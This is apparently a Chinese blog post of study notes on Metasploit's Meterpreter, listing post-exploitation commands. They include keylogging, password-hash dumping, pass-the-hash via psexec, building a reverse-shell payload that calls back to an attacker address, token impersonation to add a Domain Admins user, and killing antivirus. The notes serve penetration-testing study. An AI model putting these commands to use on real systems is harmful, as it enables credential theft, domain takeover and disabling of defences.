一、基本命令

  1. 截屏

screenshot

2.获取系统平台信息

sysinfo

3.进程信息

ps

4.获取键盘记录

查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--

run post/windows/capture/keylog_recorder

过一段时间CTRL+C中止。

最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。

5.提取密码哈希

use priv运行特权账号

run post/windows/gather/hashdump

6.传递hash值

use windows/smb/psexec

set PAYLOAD windows/meterpreter/reverse_tcp

7.权限提升

当我们获得了目标系统的访问权限,可以通过net user命令创建限制权限的普通用户帐号。

XP系统中:

net user bob password123 /add.

然后,创建一个基于Meterpreter的攻击程序payload.exe,复制到目标XP机器上,并在bob用户下运行。

利用攻击载荷生成器(msfpayload)来创建Windows可执行文件格式的Meterpreter攻击载荷程序payload.exe.

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp

LHOST=192.168.33.139 LPORT=443 X>payload.exe

root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp

LHOST=192.168.33.139 LPORT=443 E

meterpreter> getuid

创建载荷时,设置LHOST和LPORT参数指示了反向shell连接到攻击机的地址和端口443,

随后调用msfcli接口进行监听并等待连接,当有连接到达时,将会开启Meterpreter的shell。

shell

use priv

getsystem

getuid

8.令牌假冒

在令牌假冒攻击中,我们获取目标系统中的一个Kerberos令牌,将其用在身份认证环节,来假冒当初创建这个令牌的用户。这是Meterpreter最强大的功能之一。

用户登录服务器时,一个Kerberos令牌会在服务器上在一段时间内保持有效。

我们就可以利用这个令牌入侵系统,而不需破解他的密码。

9.使用PS

使用PS查看进程

使用steal_token命令和PID参数,盗取域管理员用户的令牌。PID为域管理员运行的进程

另外,有些情况下PS命令不能列出域管理员运行的进程,我们可以使用incognito命令列出系统中可用的令牌。

最好是同时检查ps命令和incognito命令的输出结果。

通过use incognito命令加载incognito模块,然后通过list_tokens -u列出令牌。

假冒令牌:

impersonate_token ****\\***(注意双斜杠)

添加用户:

add_user omgcom password123 -h 192.168.33.50(域控)

赋予域管理员权限:

add_group_user "Domain Admins" omgcom -h 192.168.33.50

10.跳板攻击(Pivoting)

允许从Meterpreter 终端攻击网络中的其他系统。

跳板攻击允许你使用已经取得控制的Meterpreter终端来攻击内部网络中的其他机器。

11.使用Meterpreter脚本

run 脚本名字

12.迁移进程

攻击系统时常常利用IE漏洞等,如果目标主机关闭了浏览器,Meterpreter会话也随之关闭,从而导致目标丢失。

渗透以后要将会话迁移到内存空间稳定的、不会关闭的服务进程中,以维持稳定的控制。

run post/windows/manage/migrate

13.关闭杀毒软件

run killav

14。获取系统密码hash

run hashdump

15.查看目标所有流量

run packetrecorder -i 1

16.获取系统信息

Scraper脚本可以获取用户名、密码、注册表、哈希值、收集系统信息等。

run scraper

17。控制持久化

Metasploit 读书笔记-神器Meterpreter的更多相关文章

  1. Metasploit 读书笔记-持久控制

    Meterpreter的persisitence脚本允许主任meterpreter代理,以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方 ...

  2. metasploit 读书笔记-EXPLOITATION

    一、渗透攻击基础 1.常用命令 show exploits 显示Meta框架中所有可用的渗透攻击模块。 show options 显示模块所需要的各种参数 back 返回Meta的上一个状态 sear ...

  3. metasploit 读书笔记-信息收集

    三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集,包括使用工具Yeti、Whois (1)Whois msf > whois secmaniac.net (2)Netcraft:fi ...

  4. metasploit 读书笔记1

    The msfpayload component of Metasploit allows you to generate shellcode, executables, and much more ...

  5. 读书笔记汇总 - SQL必知必会(第4版)

    本系列记录并分享学习SQL的过程,主要内容为SQL的基础概念及练习过程. 书目信息 中文名:<SQL必知必会(第4版)> 英文名:<Sams Teach Yourself SQL i ...

  6. 读书笔记--SQL必知必会18--视图

    读书笔记--SQL必知必会18--视图 18.1 视图 视图是虚拟的表,只包含使用时动态检索数据的查询. 也就是说作为视图,它不包含任何列和数据,包含的是一个查询. 18.1.1 为什么使用视图 重用 ...

  7. 《C#本质论》读书笔记(18)多线程处理

    .NET Framework 4.0 看(本质论第3版) .NET Framework 4.5 看(本质论第4版) .NET 4.0为多线程引入了两组新API:TPL(Task Parallel Li ...

  8. C#温故知新:《C#图解教程》读书笔记系列

    一.此书到底何方神圣? 本书是广受赞誉C#图解教程的最新版本.作者在本书中创造了一种全新的可视化叙述方式,以图文并茂的形式.朴实简洁的文字,并辅之以大量表格和代码示例,全面.直观地阐述了C#语言的各种 ...

  9. C#刨根究底:《你必须知道的.NET》读书笔记系列

    一.此书到底何方神圣? <你必须知道的.NET>来自于微软MVP—王涛(网名:AnyTao,博客园大牛之一,其博客地址为:http://anytao.cnblogs.com/)的最新技术心 ...

随机推荐

  1. 命令行启动MySQL

    1 首先打开CMD,即命令行 输入mysqld ,如出现 则说明MySQL安装路径下的bin不在系统的环境变量中,你需要进入它的安装路径的bin目录下启动. ps:如果你不知道路径可以去开始菜单,找到 ...

  2. 虚拟环境中的django及相关包安装

    1.先进入虚拟环境 pyenv activate virtualenvname. 2.安装django软件包 安装命令: pip install django==1.7 查看安装结果: python ...

  3. HDLM命令dlnkmgr详解之一__命令格式

    dlnkmgr命令格式 dlnkmgr operation [parameter [parameter-value]] dlnkmgr - The command name. operation - ...

  4. 使用百度地图API进行坐标系转换

    最近在做移动APP的定位功能的时候发现系统GPS获取的位置信息再从百度地图API获取的实际地址总是有误差,偏离了好几个街道,但百度地图本身没这个问题.在网上查找一番发现了地图的坐标系一说,下面简单介绍 ...

  5. DDD学习笔录——简介DDD的战略模式如何塑造应用程序的架构

    前一篇,简单介绍了DDD战略模式的提炼问题域,这篇简单介绍它如何塑造应用程序的架构. 1.创建一个模型以解决领域问题 为每一个子域构建一个软件模型以处理领域问题并让软件与业务保持一致. 这个模型并非现 ...

  6. C# Remoting 简单实现

    此处下载源代码(VS2010编译通过)   http://files.cnblogs.com/files/qqhfeng/%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8%E6 ...

  7. linux命令-du查看占用磁盘空间大小

    格式 df -h 查看磁盘分区情况 du /etc 目录文件大小都列出来 单位是k最后一行是总和 du -m 单位是m 小于1m写成1m du -h 单位人性化显示k/m du -sh /etc 查看 ...

  8. DAY7-面向对象之绑定方法与非绑定方法

    一.类中定义的函数分成两大类 一:绑定方法(绑定给谁,谁来调用就自动将它本身当作第一个参数传入): 1. 绑定到类的方法:用classmethod装饰器装饰的方法. 为类量身定制 类.boud_met ...

  9. xftp permission is not allowed

    上传文件时出现此项错误: permission is not allowed, 原因: 1.可能vsfptd没有配置好 写权限没有开启 2.可能是当前的目录权限,上传的用户不具有: 比如:用户hado ...

  10. fragment界面交互实操(步骤)

    首先,新建一个继承了fragment类的类,在oncreateview方法中,使用方法的参数inflater,用其inflater.inflate(R.layout.fragment1,contain ...